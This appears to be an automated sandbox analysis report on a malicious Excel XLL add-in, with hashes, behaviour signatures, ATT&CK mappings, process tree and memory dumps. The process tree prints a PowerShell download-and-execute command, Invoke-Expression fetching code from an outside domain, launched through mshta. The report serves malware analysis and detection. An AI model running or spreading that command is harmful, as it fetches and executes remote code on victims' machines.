Analysis

  • max time kernel
    146s
  • max time network
    150s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    22-05-2024 20:30

General

  • Target

    d247fc1438ce9ab6f78351bcef3c347acaa9b1591be992e49162916a27d0146f.xll

  • Size

    12KB

  • MD5

    e99a2438e6a578df91082d4f5df91b20

  • SHA1

    1eac9032940b00e58da63926d3ee7555ac7e2da7

  • SHA256

    d247fc1438ce9ab6f78351bcef3c347acaa9b1591be992e49162916a27d0146f

  • SHA512

    9eead575cafe579c51d97f15b715d4daf27879adeb9c2cb203452f6a5323b38e5bda223a97a91e9c8763ac1b785f4cf0749a1b26e4d1236c9beb66de4c2c208f

  • SSDEEP

    192:/L29RBzDzeobchBj8JONvONXZruhrEPEjr7Ahg:T29jnbcvYJOAfuhvr7Cg

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\d247fc1438ce9ab6f78351bcef3c347acaa9b1591be992e49162916a27d0146f.xll"
    1⤵
    • Loads dropped DLL
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1188
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:132
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4608

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\J6994X5U\d[1].htm
    Filesize

    2KB

    MD5

    f754844cfb65838d1dd6b19dde5d835c

    SHA1

    b3eb677783adc88c8d048898449e04d49f416db6

    SHA256

    3644b387519f3509a1ce3d2201e2e1e8af36217138cc6f9e62d6e37c887097a6

    SHA512

    f42f89562b5c0be86dbd04683ee6c30711155acd1239e273da726c2bfedf5d0806c479b7107792c136bff6e97efb8d9145df0c176f499f86f1b7e304a2e3ccdf

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zqutxl1g.3mk.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\d247fc1438ce9ab6f78351bcef3c347acaa9b1591be992e49162916a27d0146f.xll
    Filesize

    12KB

    MD5

    e99a2438e6a578df91082d4f5df91b20

    SHA1

    1eac9032940b00e58da63926d3ee7555ac7e2da7

    SHA256

    d247fc1438ce9ab6f78351bcef3c347acaa9b1591be992e49162916a27d0146f

    SHA512

    9eead575cafe579c51d97f15b715d4daf27879adeb9c2cb203452f6a5323b38e5bda223a97a91e9c8763ac1b785f4cf0749a1b26e4d1236c9beb66de4c2c208f

  • memory/1188-10-0x00007FF9069C0000-0x00007FF906BC9000-memory.dmp
    Filesize

    2.0MB

  • memory/1188-80-0x00007FF8C6A50000-0x00007FF8C6A60000-memory.dmp
    Filesize

    64KB

  • memory/1188-5-0x00007FF8C6A50000-0x00007FF8C6A60000-memory.dmp
    Filesize

    64KB

  • memory/1188-6-0x00007FF9069C0000-0x00007FF906BC9000-memory.dmp
    Filesize

    2.0MB

  • memory/1188-7-0x00007FF9069C0000-0x00007FF906BC9000-memory.dmp
    Filesize

    2.0MB

  • memory/1188-2-0x00007FF8C6A50000-0x00007FF8C6A60000-memory.dmp
    Filesize

    64KB

  • memory/1188-79-0x00007FF8C6A50000-0x00007FF8C6A60000-memory.dmp
    Filesize

    64KB

  • memory/1188-8-0x00007FF9069C0000-0x00007FF906BC9000-memory.dmp
    Filesize

    2.0MB

  • memory/1188-12-0x00007FF8C4650000-0x00007FF8C4660000-memory.dmp
    Filesize

    64KB

  • memory/1188-13-0x00007FF9069C0000-0x00007FF906BC9000-memory.dmp
    Filesize

    2.0MB

  • memory/1188-11-0x00007FF9069C0000-0x00007FF906BC9000-memory.dmp
    Filesize

    2.0MB

  • memory/1188-14-0x00007FF8C4650000-0x00007FF8C4660000-memory.dmp
    Filesize

    64KB

  • memory/1188-4-0x00007FF906A63000-0x00007FF906A64000-memory.dmp
    Filesize

    4KB

  • memory/1188-0-0x00007FF8C6A50000-0x00007FF8C6A60000-memory.dmp
    Filesize

    64KB

  • memory/1188-81-0x00007FF9069C0000-0x00007FF906BC9000-memory.dmp
    Filesize

    2.0MB

  • memory/1188-3-0x00007FF8C6A50000-0x00007FF8C6A60000-memory.dmp
    Filesize

    64KB

  • memory/1188-9-0x00007FF9069C0000-0x00007FF906BC9000-memory.dmp
    Filesize

    2.0MB

  • memory/1188-78-0x00007FF8C6A50000-0x00007FF8C6A60000-memory.dmp
    Filesize

    64KB

  • memory/1188-77-0x00007FF8C6A50000-0x00007FF8C6A60000-memory.dmp
    Filesize

    64KB

  • memory/1188-1-0x00007FF8C6A50000-0x00007FF8C6A60000-memory.dmp
    Filesize

    64KB

  • memory/1188-61-0x00007FF9069C0000-0x00007FF906BC9000-memory.dmp
    Filesize

    2.0MB

  • memory/1188-60-0x00007FF9069C0000-0x00007FF906BC9000-memory.dmp
    Filesize

    2.0MB

  • memory/4608-47-0x0000000005D50000-0x0000000005D9C000-memory.dmp
    Filesize

    304KB

  • memory/4608-50-0x0000000006220000-0x000000000623A000-memory.dmp
    Filesize

    104KB

  • memory/4608-49-0x0000000007360000-0x00000000079DA000-memory.dmp
    Filesize

    6.5MB

  • memory/4608-46-0x0000000005D10000-0x0000000005D2E000-memory.dmp
    Filesize

    120KB

  • memory/4608-45-0x00000000058B0000-0x0000000005C07000-memory.dmp
    Filesize

    3.3MB

  • memory/4608-36-0x0000000005840000-0x00000000058A6000-memory.dmp
    Filesize

    408KB

  • memory/4608-35-0x0000000005760000-0x00000000057C6000-memory.dmp
    Filesize

    408KB

  • memory/4608-33-0x0000000004F40000-0x000000000556A000-memory.dmp
    Filesize

    6.2MB

  • memory/4608-34-0x0000000004EF0000-0x0000000004F12000-memory.dmp
    Filesize

    136KB

  • memory/4608-32-0x00000000048D0000-0x0000000004906000-memory.dmp
    Filesize

    216KB